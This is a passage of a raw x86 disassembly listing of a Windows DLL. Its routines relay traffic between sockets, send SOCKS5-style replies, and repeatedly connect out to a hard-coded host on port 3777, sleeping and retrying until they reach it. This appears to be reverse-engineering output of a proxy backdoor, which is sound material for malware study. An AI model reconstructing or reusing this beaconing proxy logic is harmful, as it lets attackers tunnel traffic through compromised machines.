loc_10014145: ; CODE XREF: sub_10013E02+32A�j
jmp loc_100140C6
; ---------------------------------------------------------------------------
loc_1001414A: ; CODE XREF: sub_10013E02+2F5�j
; sub_10013E02+321�j ...
mov [ebp+var_C6A4], 0
jmp short loc_10014165
; ---------------------------------------------------------------------------
loc_10014156: ; CODE XREF: sub_10013E02:loc_1001418A�j
mov eax, [ebp+var_C6A4]
add eax, 1
mov [ebp+var_C6A4], eax
loc_10014165: ; CODE XREF: sub_10013E02+352�j
mov ecx, [ebp+var_C6A4]
cmp ecx, [ebp+readfds.fd_count]
jnb short loc_1001418C
mov edx, [ebp+var_C6A4]
mov eax, [ebp+edx*4+readfds.fd_array]
cmp eax, [ebp+s]
jnz short loc_1001418A
jmp short loc_1001418C
; ---------------------------------------------------------------------------
loc_1001418A: ; CODE XREF: sub_10013E02+384�j
jmp short loc_10014156
; ---------------------------------------------------------------------------
loc_1001418C: ; CODE XREF: sub_10013E02+36F�j
; sub_10013E02+386�j
mov ecx, [ebp+var_C6A4]
cmp ecx, [ebp+readfds.fd_count]
jnz short loc_100141C5
cmp [ebp+readfds.fd_count], 40h
jnb short loc_100141C5
mov edx, [ebp+var_C6A4]
mov eax, [ebp+s]
mov [ebp+edx*4+readfds.fd_array], eax
mov ecx, [ebp+readfds.fd_count]
add ecx, 1
mov [ebp+readfds.fd_count], ecx
loc_100141C5: ; CODE XREF: sub_10013E02+396�j
; sub_10013E02+39F�j
xor edx, edx
test edx, edx
jnz loc_1001414A
lea eax, [ebp+timeout]
push eax ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea ecx, [ebp+readfds]
push ecx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 0C440h ; len
lea edx, [ebp+String2]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
mov [ebp+var_C684], eax
cmp [ebp+var_C684], 0FFFFFFFFh
jnz short loc_10014238
cmp [ebp+var_C694], 0
jnz short loc_10014233
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov [ebp+var_C694], 1
loc_10014233: ; CODE XREF: sub_10013E02+418�j
jmp loc_100140C6
; ---------------------------------------------------------------------------
loc_10014238: ; CODE XREF: sub_10013E02+40F�j
cmp [ebp+var_C684], 0
jnz short loc_10014263
cmp [ebp+var_C694], 0
jnz short loc_10014261
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov [ebp+var_C694], 1
loc_10014261: ; CODE XREF: sub_10013E02+446�j
jmp short loc_10014274
; ---------------------------------------------------------------------------
loc_10014263: ; CODE XREF: sub_10013E02+43D�j
mov eax, [ebp+var_C684]
mov [ebp+len], eax
jmp loc_100140C6
; ---------------------------------------------------------------------------
loc_10014274: ; CODE XREF: sub_10013E02+2CB�j
; sub_10013E02+2D8�j ...
cmp [ebp+var_C690], 0
jnz short loc_10014294
mov ecx, [ebp+var_C698]
push ecx ; s
call ds:closesocket ; closesocket
mov [ebp+var_C690], 1
loc_10014294: ; CODE XREF: sub_10013E02+479�j
cmp [ebp+var_C694], 0
jnz short loc_100142B4
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov [ebp+var_C694], 1
loc_100142B4: ; CODE XREF: sub_10013E02+499�j
push 4E20h ; dwMilliseconds
mov eax, [ebp+hHandle]
push eax ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
jmp short loc_100142E0
; ---------------------------------------------------------------------------
loc_100142C8: ; DATA XREF: .rdata:stru_10020108�o
mov [ebp+var_C6A8], 0
mov eax, offset loc_100142D8
retn
; ---------------------------------------------------------------------------
loc_100142D8: ; DATA XREF: sub_10013E02+4D0�o
mov eax, [ebp+var_C6A8]
jmp short loc_100142EC
; ---------------------------------------------------------------------------
loc_100142E0: ; CODE XREF: sub_10013E02+4C4�j
mov [ebp+var_4], 0FFFFFFFFh
mov eax, 1
loc_100142EC: ; CODE XREF: sub_10013E02+AA�j
; sub_10013E02+4DC�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_10013E02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_100142FF(LPVOID)
sub_100142FF proc near ; DATA XREF: sub_10013E02+271�o
var_C594 = dword ptr -0C594h
var_C590 = dword ptr -0C590h
s = dword ptr -0C58Ch
name = dword ptr -0C588h
hostshort = word ptr -0C584h
var_C580 = dword ptr -0C580h
len = dword ptr -0C57Ch
readfds = fd_set ptr -0C578h
type = dword ptr -0C474h
timeout = timeval ptr -0C470h
var_C468 = dword ptr -0C468h
var_C464 = dword ptr -0C464h
buf = byte ptr -0C460h
Dst = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_100142FF
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov eax, 0C584h
call __alloca_probe
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov eax, [ebp+arg_0]
mov [ebp+var_C468], eax
mov [ebp+name], offset aLocalhost ; "localhost"
mov [ebp+type], 1
mov ecx, [ebp+var_C468]
mov [ebp+name], ecx
mov edx, [ebp+var_C468]
mov ax, [edx+108h]
mov [ebp+hostshort], ax
mov [ebp+readfds.fd_count], 0
mov [ebp+timeout.tv_sec], 0
mov [ebp+timeout.tv_usec], 989680h
mov [ebp+var_4], 0
mov ecx, [ebp+name]
push ecx ; name
call ds:gethostbyname ; gethostbyname
mov [ebp+var_C464], eax
cmp [ebp+var_C464], 0
jnz short loc_100143E5
call ds:WSAGetLastError ; WSAGetLastError
push eax
mov edx, [ebp+name]
push edx
push offset aClientCannotRe ; "Client: Cannot resolve address [%s]: Er"...
mov eax, ds:_iob
add eax, 40h
push eax ; File
call ds:fprintf ; fprintf
add esp, 10h
mov ecx, [ebp+var_C468]
mov edx, [ecx+100h]
push edx ; hEvent
call ds:SetEvent ; SetEvent
xor eax, eax
jmp loc_10014756
; ---------------------------------------------------------------------------
loc_100143E5: ; CODE XREF: sub_100142FF+A5�j
push 10h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+var_C464]
movsx edx, word ptr [ecx+0Ah]
push edx ; Size
mov eax, [ebp+var_C464]
mov ecx, [eax+0Ch]
mov edx, [ecx]
push edx ; Src
lea eax, [ebp+var_1C]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov ecx, [ebp+var_C464]
mov dx, [ecx+8]
mov [ebp+Dst], dx
mov ax, [ebp+hostshort]
push eax ; hostshort
call ds:htons ; htons
mov [ebp+var_1E], ax
push 0 ; protocol
mov ecx, [ebp+type]
push ecx ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0
jnb short loc_10014486
mov edx, [ebp+var_C468]
mov eax, [edx+104h]
mov dword ptr [eax+0Ch], 1
mov ecx, [ebp+var_C468]
mov edx, [ecx+100h]
push edx ; hEvent
call ds:SetEvent ; SetEvent
or eax, 0FFFFFFFFh
jmp loc_10014756
; ---------------------------------------------------------------------------
loc_10014486: ; CODE XREF: sub_100142FF+157�j
push 10h ; namelen
lea eax, [ebp+Dst]
push eax ; name
mov ecx, [ebp+s]
push ecx ; s
call ds:connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_100144CC
mov edx, [ebp+var_C468]
mov eax, [edx+104h]
mov dword ptr [eax+0Ch], 1
mov ecx, [ebp+var_C468]
mov edx, [ecx+100h]
push edx ; hEvent
call ds:SetEvent ; SetEvent
or eax, 0FFFFFFFFh
jmp loc_10014756
; ---------------------------------------------------------------------------
loc_100144CC: ; CODE XREF: sub_100142FF+19D�j
mov eax, [ebp+var_C468]
mov ecx, [eax+104h]
mov edx, [ebp+s]
mov [ecx+4], edx
mov eax, [ebp+var_C468]
mov ecx, [eax+104h]
mov dword ptr [ecx+0Ch], 0
mov edx, [ebp+var_C468]
mov eax, [edx+100h]
push eax ; hEvent
call ds:SetEvent ; SetEvent
loc_10014507: ; CODE XREF: sub_100142FF:loc_100146B6�j
mov ecx, [ebp+var_C468]
mov edx, [ecx+104h]
cmp dword ptr [edx+0Ch], 0
jnz loc_100146BB
mov eax, [ebp+var_C468]
mov ecx, [eax+104h]
cmp dword ptr [ecx+8], 0
jnz loc_100146BB
loc_10014533: ; CODE XREF: sub_100142FF+2B3�j
mov [ebp+var_C590], 0
jmp short loc_1001454E
; ---------------------------------------------------------------------------
loc_1001453F: ; CODE XREF: sub_100142FF:loc_10014573�j
mov edx, [ebp+var_C590]
add edx, 1
mov [ebp+var_C590], edx
loc_1001454E: ; CODE XREF: sub_100142FF+23E�j
mov eax, [ebp+var_C590]
cmp eax, [ebp+readfds.fd_count]
jnb short loc_10014575
mov ecx, [ebp+var_C590]
mov edx, [ebp+ecx*4+readfds.fd_array]
cmp edx, [ebp+s]
jnz short loc_10014573
jmp short loc_10014575
; ---------------------------------------------------------------------------
loc_10014573: ; CODE XREF: sub_100142FF+270�j
jmp short loc_1001453F
; ---------------------------------------------------------------------------
loc_10014575: ; CODE XREF: sub_100142FF+25B�j
; sub_100142FF+272�j
mov eax, [ebp+var_C590]
cmp eax, [ebp+readfds.fd_count]
jnz short loc_100145AE
cmp [ebp+readfds.fd_count], 40h
jnb short loc_100145AE
mov ecx, [ebp+var_C590]
mov edx, [ebp+s]
mov [ebp+ecx*4+readfds.fd_array], edx
mov eax, [ebp+readfds.fd_count]
add eax, 1
mov [ebp+readfds.fd_count], eax
loc_100145AE: ; CODE XREF: sub_100142FF+282�j
; sub_100142FF+28B�j
xor ecx, ecx
test ecx, ecx
jnz loc_10014533
lea edx, [ebp+timeout]
push edx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 0C440h ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
mov [ebp+var_C580], eax
cmp [ebp+var_C580], 0FFFFFFFFh
jnz short loc_10014621
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
mov ecx, [ebp+var_C468]
mov edx, [ecx+104h]
mov dword ptr [edx+0Ch], 1
jmp loc_100146BB
; ---------------------------------------------------------------------------
loc_10014621: ; CODE XREF: sub_100142FF+2FB�j
mov eax, [ebp+var_C580]
mov [ebp+len], eax
cmp [ebp+var_C580], 0
jnz short loc_10014658
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov edx, [ebp+var_C468]
mov eax, [edx+104h]
mov dword ptr [eax+0Ch], 1
jmp short loc_100146BB
; ---------------------------------------------------------------------------
loc_10014658: ; CODE XREF: sub_100142FF+335�j
push 0 ; flags
mov ecx, [ebp+len]
push ecx ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+var_C468]
mov ecx, [eax+104h]
mov edx, [ecx]
push edx ; s
call ds:send ; send
mov [ebp+var_C580], eax
cmp [ebp+var_C580], 0FFFFFFFFh
jnz short loc_100146B6
mov eax, [ebp+var_C468]
mov ecx, [eax+104h]
mov edx, [ecx]
push edx ; s
call ds:closesocket ; closesocket
mov eax, [ebp+var_C468]
mov ecx, [eax+104h]
mov dword ptr [ecx+8], 1
jmp short loc_100146BB
; ---------------------------------------------------------------------------
loc_100146B6: ; CODE XREF: sub_100142FF+38B�j
jmp loc_10014507
; ---------------------------------------------------------------------------
loc_100146BB: ; CODE XREF: sub_100142FF+218�j
; sub_100142FF+22E�j ...
mov edx, [ebp+var_C468]
mov eax, [edx+104h]
cmp dword ptr [eax+0Ch], 0
jnz short loc_100146F6
mov ecx, [ebp+var_C468]
mov edx, [ecx+104h]
mov eax, [edx+4]
push eax ; s
call ds:closesocket ; closesocket
mov ecx, [ebp+var_C468]
mov edx, [ecx+104h]
mov dword ptr [edx+0Ch], 1
loc_100146F6: ; CODE XREF: sub_100142FF+3CC�j
mov eax, [ebp+var_C468]
mov ecx, [eax+104h]
cmp dword ptr [ecx+8], 0
jnz short loc_10014730
mov edx, [ebp+var_C468]
mov eax, [edx+104h]
mov ecx, [eax]
push ecx ; s
call ds:closesocket ; closesocket
mov edx, [ebp+var_C468]
mov eax, [edx+104h]
mov dword ptr [eax+8], 1
loc_10014730: ; CODE XREF: sub_100142FF+407�j
jmp short loc_1001474A
; ---------------------------------------------------------------------------
loc_10014732: ; DATA XREF: .rdata:stru_10020160�o
mov [ebp+var_C594], 0
mov eax, offset loc_10014742
retn
; ---------------------------------------------------------------------------
loc_10014742: ; DATA XREF: sub_100142FF+43D�o
mov eax, [ebp+var_C594]
jmp short loc_10014756
; ---------------------------------------------------------------------------
loc_1001474A: ; CODE XREF: sub_100142FF:loc_10014730�j
mov [ebp+var_4], 0FFFFFFFFh
mov eax, 1
loc_10014756: ; CODE XREF: sub_100142FF+E1�j
; sub_100142FF+182�j ...
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_100142FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10014769(SOCKET s, int)
sub_10014769 proc near ; CODE XREF: sub_10014B0F+D30�p
; sub_10014B0F+DFD�p ...
var_38 = dword ptr -38h
var_34 = dword ptr -34h
namelen = dword ptr -30h
name = sockaddr ptr -2Ch
buf = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_10014769
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 28h
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+namelen], 10h
mov [ebp+buf], 5
mov eax, [ebp+arg_4]
mov [ebp+var_38], eax
mov ecx, [ebp+var_38]
sub ecx, 2742h
mov [ebp+var_38], ecx
cmp [ebp+var_38], 0Bh
ja short loc_100147D8
mov eax, [ebp+var_38]
xor edx, edx
mov dl, ds:byte_10014865[eax]
jmp ds:off_10014851[edx*4]
loc_100147C0: ; DATA XREF: .text:off_10014851�o
mov [ebp+var_1B], 3
jmp short loc_100147DC
; ---------------------------------------------------------------------------
loc_100147C6: ; CODE XREF: sub_10014769+50�j
; DATA XREF: .text:10014855�o
mov [ebp+var_1B], 3
jmp short loc_100147DC
; ---------------------------------------------------------------------------
loc_100147CC: ; CODE XREF: sub_10014769+50�j
; DATA XREF: .text:1001485D�o
mov [ebp+var_1B], 5
jmp short loc_100147DC
; ---------------------------------------------------------------------------
loc_100147D2: ; CODE XREF: sub_10014769+50�j
; DATA XREF: .text:10014859�o
mov [ebp+var_1B], 4
jmp short loc_100147DC
; ---------------------------------------------------------------------------
loc_100147D8: ; CODE XREF: sub_10014769+43�j
; sub_10014769+50�j
; DATA XREF: ...
mov [ebp+var_1B], 1
loc_100147DC: ; CODE XREF: sub_10014769+5B�j
; sub_10014769+61�j ...
mov [ebp+var_1A], 0
mov [ebp+var_19], 1
mov [ebp+var_4], 0
lea ecx, [ebp+namelen]
push ecx ; namelen
lea edx, [ebp+name]
push edx ; name
mov eax, [ebp+s]
push eax ; s
call ds:getsockname ; getsockname
mov ecx, dword ptr [ebp+name.sa_data+2]
mov [ebp+var_18], ecx
push 0FA0h ; hostshort
call ds:htons ; htons
mov [ebp+var_14], ax
push 0 ; flags
push 0Ah ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
mov [ebp+var_34], eax
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
jmp short loc_10014839
; ---------------------------------------------------------------------------
loc_10014833: ; DATA XREF: .rdata:stru_100201B8�o
mov eax, offset loc_10014840
retn
; ---------------------------------------------------------------------------
loc_10014839: ; CODE XREF: sub_10014769+C8�j
mov [ebp+var_4], 0FFFFFFFFh
loc_10014840: ; DATA XREF: sub_10014769:loc_10014833�o
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_10014769 endp
; ---------------------------------------------------------------------------
off_10014851 dd offset loc_100147C0 ; DATA XREF: sub_10014769+50�r
dd offset loc_100147C6
dd offset loc_100147D2
dd offset loc_100147CC
dd offset loc_100147D8
byte_10014865 db 0 ; DATA XREF: sub_10014769+4A�r
; ---------------------------------------------------------------------------
add [esp+eax], eax
add al, 4
add al, 4
add al, 4
add al, [ebx]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10014871(int, SOCKET s)
sub_10014871 proc near ; CODE XREF: sub_10014B0F+D4E�p
; sub_10014B0F+E63�p ...
var_34 = dword ptr -34h
namelen = dword ptr -30h
name = sockaddr ptr -2Ch
buf = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
s = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_10014871
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 24h
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+namelen], 10h
mov [ebp+buf], 5
mov [ebp+var_1B], 0
mov [ebp+var_1A], 0
mov [ebp+var_19], 1
mov [ebp+var_4], 0
lea eax, [ebp+namelen]
push eax ; namelen
lea ecx, [ebp+name]
push ecx ; name
mov edx, [ebp+s]
push edx ; s
call ds:getsockname ; getsockname
mov eax, dword ptr [ebp+name.sa_data+2]
mov [ebp+var_18], eax
mov cx, word ptr [ebp+name.sa_data]
mov [ebp+var_14], cx
push 0 ; flags
push 0Ah ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+arg_0]
push eax ; s
call ds:send ; send
mov [ebp+var_34], eax
cmp [ebp+var_34], 0FFFFFFFFh
jnz short loc_100148F6
mov ecx, [ebp+arg_0]
push ecx ; s
call ds:closesocket ; closesocket
loc_100148F6: ; CODE XREF: sub_10014871+79�j
jmp short loc_100148FE
; ---------------------------------------------------------------------------
loc_100148F8: ; DATA XREF: .rdata:stru_10020210�o
mov eax, offset loc_10014905
retn
; ---------------------------------------------------------------------------
loc_100148FE: ; CODE XREF: sub_10014871:loc_100148F6�j
mov [ebp+var_4], 0FFFFFFFFh
loc_10014905: ; DATA XREF: sub_10014871:loc_100148F8�o
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_10014871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_10014916(LPVOID)
sub_10014916 proc near ; DATA XREF: sub_10014B0F+F20�o
; sub_10015BF1+D2B�o
var_C484 = dword ptr -0C484h
var_C480 = dword ptr -0C480h
s = dword ptr -0C47Ch
len = dword ptr -0C478h
readfds = fd_set ptr -0C474h
var_C370 = dword ptr -0C370h
timeout = timeval ptr -0C36Ch
var_C364 = dword ptr -0C364h
buf = byte ptr -0C360h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_10014916
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov eax, 0C474h
call __alloca_probe
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov eax, [ebp+arg_0]
mov [ebp+var_C370], eax
mov ecx, [ebp+var_C370]
mov edx, [ecx]
mov [ebp+var_C364], edx
mov eax, [ebp+var_C370]
mov ecx, [eax+4]
mov [ebp+s], ecx
mov [ebp+readfds.fd_count], 0
mov [ebp+timeout.tv_sec], 0
mov [ebp+timeout.tv_usec], 989680h
mov [ebp+var_4], 0
loc_1001498A: ; CODE XREF: sub_10014916:loc_10014AD4�j
mov edx, 1
test edx, edx
jz loc_10014AD9
loc_10014997: ; CODE XREF: sub_10014916+100�j
mov [ebp+var_C480], 0
jmp short loc_100149B2
; ---------------------------------------------------------------------------
loc_100149A3: ; CODE XREF: sub_10014916:loc_100149D7�j
mov eax, [ebp+var_C480]
add eax, 1
mov [ebp+var_C480], eax
loc_100149B2: ; CODE XREF: sub_10014916+8B�j
mov ecx, [ebp+var_C480]
cmp ecx, [ebp+readfds.fd_count]
jnb short loc_100149D9
mov edx, [ebp+var_C480]
mov eax, [ebp+edx*4+readfds.fd_array]
cmp eax, [ebp+s]
jnz short loc_100149D7
jmp short loc_100149D9
; ---------------------------------------------------------------------------
loc_100149D7: ; CODE XREF: sub_10014916+BD�j
jmp short loc_100149A3
; ---------------------------------------------------------------------------
loc_100149D9: ; CODE XREF: sub_10014916+A8�j
; sub_10014916+BF�j
mov ecx, [ebp+var_C480]
cmp ecx, [ebp+readfds.fd_count]
jnz short loc_10014A12
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10014A12
mov edx, [ebp+var_C480]
mov eax, [ebp+s]
mov [ebp+edx*4+readfds.fd_array], eax
mov ecx, [ebp+readfds.fd_count]
add ecx, 1
mov [ebp+readfds.fd_count], ecx
loc_10014A12: ; CODE XREF: sub_10014916+CF�j
; sub_10014916+D8�j
xor edx, edx
test edx, edx
jnz loc_10014997
lea eax, [ebp+timeout]
push eax ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea ecx, [ebp+readfds]
push ecx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 0C350h ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10014A77
mov ecx, [ebp+var_C364]
push ecx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10014AFC
; ---------------------------------------------------------------------------
loc_10014A77: ; CODE XREF: sub_10014916+148�j
cmp [ebp+len], 0
jnz short loc_10014A94
mov edx, [ebp+var_C364]
push edx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp short loc_10014AFC
; ---------------------------------------------------------------------------
loc_10014A94: ; CODE XREF: sub_10014916+168�j
push 0 ; flags
mov eax, [ebp+len]
push eax ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+var_C364]
push edx ; s
call ds:send ; send
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10014AD4
mov eax, [ebp+var_C364]
push eax ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp short loc_10014AFC
; ---------------------------------------------------------------------------
loc_10014AD4: ; CODE XREF: sub_10014916+1A8�j
jmp loc_1001498A
; ---------------------------------------------------------------------------
loc_10014AD9: ; CODE XREF: sub_10014916+7B�j
jmp short loc_10014AF3
; ---------------------------------------------------------------------------
loc_10014ADB: ; DATA XREF: .rdata:stru_10020268�o
mov [ebp+var_C484], 0
mov eax, offset loc_10014AEB
retn
; ---------------------------------------------------------------------------
loc_10014AEB: ; DATA XREF: sub_10014916+1CF�o
mov eax, [ebp+var_C484]
jmp short loc_10014AFC
; ---------------------------------------------------------------------------
loc_10014AF3: ; CODE XREF: sub_10014916:loc_10014AD9�j
mov [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_10014AFC: ; CODE XREF: sub_10014916+15C�j
; sub_10014916+17C�j ...
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_10014916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10014B0F proc near ; DATA XREF: .text:10016B9B�o
var_C540 = dword ptr -0C540h
var_C53C = dword ptr -0C53Ch
var_C538 = dword ptr -0C538h
var_C534 = byte ptr -0C534h
var_C530 = byte ptr -0C530h
var_C52C = dword ptr -0C52Ch
var_C528 = dword ptr -0C528h
var_C524 = dword ptr -0C524h
var_C520 = dword ptr -0C520h
var_C51C = word ptr -0C51Ch
var_C51A = word ptr -0C51Ah
var_C518 = dword ptr -0C518h
var_C50C = dword ptr -0C50Ch
var_C508 = word ptr -0C508h
var_C506 = word ptr -0C506h
Dst = dword ptr -0C504h
var_C4F8 = dword ptr -0C4F8h
var_C4F4 = dword ptr -0C4F4h
var_C4F0 = dword ptr -0C4F0h
var_C4EC = byte ptr -0C4ECh
var_C4E8 = dword ptr -0C4E8h
var_C4E4 = dword ptr -0C4E4h
var_C4E0 = dword ptr -0C4E0h
var_C4DC = dword ptr -0C4DCh
var_C4D8 = dword ptr -0C4D8h
var_C4D4 = dword ptr -0C4D4h
var_C4D0 = dword ptr -0C4D0h
var_C4CC = dword ptr -0C4CCh
var_C4C8 = dword ptr -0C4C8h
readfds = fd_set ptr -0C4C4h
len = dword ptr -0C3C0h
var_C3BC = dword ptr -0C3BCh
timeout = timeval ptr -0C3B8h
var_C3B0 = dword ptr -0C3B0h
var_C3AC = dword ptr -0C3ACh
var_C3A8 = dword ptr -0C3A8h
var_C3A4 = byte ptr -0C3A4h
var_C3A0 = dword ptr -0C3A0h
var_C39C = dword ptr -0C39Ch
var_C398 = byte ptr -0C398h
var_C394 = byte ptr -0C394h
var_C390 = byte ptr -0C390h
var_C38C = word ptr -0C38Ch
ThreadId = dword ptr -0C388h
s = dword ptr -0C384h
buf = byte ptr -0C380h
cbBytesReturned = dword ptr -0C37Ch
var_C378 = byte ptr -0C378h
lpParameter = dword ptr -28h
name = sockaddr ptr -24h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_10014B0F
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov eax, 0C530h
call __alloca_probe
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+var_4], 0
push 6 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jnz short loc_10014B64
mov eax, 0FFFFFFFEh
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10014B64: ; CODE XREF: sub_10014B0F+49�j
mov [ebp+name.sa_family], 2
push 0EC1h ; hostshort
call ds:htons ; htons
mov word ptr [ebp+name.sa_data], ax
push offset name ; name
call ds:gethostbyname ; gethostbyname
mov [ebp+var_C3AC], eax
cmp [ebp+var_C3AC], 0
jz short loc_10014BAD
push 4 ; Size
mov eax, [ebp+var_C3AC]
mov ecx, [eax+0Ch]
mov edx, [ecx]
push edx ; Src
lea eax, [ebp+name.sa_data+2]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
loc_10014BAD: ; CODE XREF: sub_10014B0F+82�j
mov dword_10073E28, 1
mov dword_10073E2C, 64h
mov dword_10073E30, 0Ah
mov [ebp+cbBytesReturned], 0
loc_10014BD5: ; CODE XREF: sub_10014B0F+E8�j
push 10h ; namelen
lea ecx, [ebp+name]
push ecx ; name
mov edx, [ebp+s]
push edx ; s
call ds:connect ; connect
test eax, eax
jz short loc_10014BF9
push 0EA60h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_10014BD5
; ---------------------------------------------------------------------------
loc_10014BF9: ; CODE XREF: sub_10014B0F+DB�j
push 0 ; flags
push offset byte_10065ED8 ; lpString
call ds:lstrlenA ; lstrlenA
push eax ; len
push offset byte_10065ED8 ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
mov [ebp+var_C4C8], eax
loc_10014C1F: ; CODE XREF: sub_10014B0F+1E6�j
; sub_10014B0F+1037�j
mov [ebp+var_C39C], 0
mov [ebp+readfds.fd_count], 0
mov [ebp+timeout.tv_sec], 0
mov [ebp+timeout.tv_usec], 989680h
loc_10014C47: ; CODE XREF: sub_10014B0F+1B7�j
mov [ebp+var_C4D0], 0
jmp short loc_10014C62
; ---------------------------------------------------------------------------
loc_10014C53: ; CODE XREF: sub_10014B0F:loc_10014C87�j
mov ecx, [ebp+var_C4D0]
add ecx, 1
mov [ebp+var_C4D0], ecx
loc_10014C62: ; CODE XREF: sub_10014B0F+142�j
mov edx, [ebp+var_C4D0]
cmp edx, [ebp+readfds.fd_count]
jnb short loc_10014C89
mov eax, [ebp+var_C4D0]
mov ecx, [ebp+eax*4+readfds.fd_array]
cmp ecx, [ebp+s]
jnz short loc_10014C87
jmp short loc_10014C89
; ---------------------------------------------------------------------------
loc_10014C87: ; CODE XREF: sub_10014B0F+174�j
jmp short loc_10014C53
; ---------------------------------------------------------------------------
loc_10014C89: ; CODE XREF: sub_10014B0F+15F�j
; sub_10014B0F+176�j
mov edx, [ebp+var_C4D0]
cmp edx, [ebp+readfds.fd_count]
jnz short loc_10014CC2
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10014CC2
mov eax, [ebp+var_C4D0]
mov ecx, [ebp+s]
mov [ebp+eax*4+readfds.fd_array], ecx
mov edx, [ebp+readfds.fd_count]
add edx, 1
mov [ebp+readfds.fd_count], edx
loc_10014CC2: ; CODE XREF: sub_10014B0F+186�j
; sub_10014B0F+18F�j
xor eax, eax
test eax, eax
jnz loc_10014C47
lea ecx, [ebp+timeout]
push ecx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
push 0 ; nfds
call ds:select ; select
mov [ebp+var_C39C], eax
cmp [ebp+var_C39C], 0
